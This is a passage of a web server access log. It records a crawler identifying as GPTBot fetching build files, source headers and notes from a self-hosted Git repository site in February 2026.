like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13697] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:16:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10192] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:16:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13699] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:16:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10193] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:16:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:16:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:16:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:16:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:16:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 29] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:16:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11598] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11600] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10307] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10313] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11571] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" -[17/Feb/2026:16:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild_exe.py" [Client 74.7.227.38] [Length 26203] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" -[17/Feb/2026:16:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fui_main.py" [Client 74.7.227.38] [Length 44020] [Gzip 9.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" -[17/Feb/2026:16:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" -[17/Feb/2026:16:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33676] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33675] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33677] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10809] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10808] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10785] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43109] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43111] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43109] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10807] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 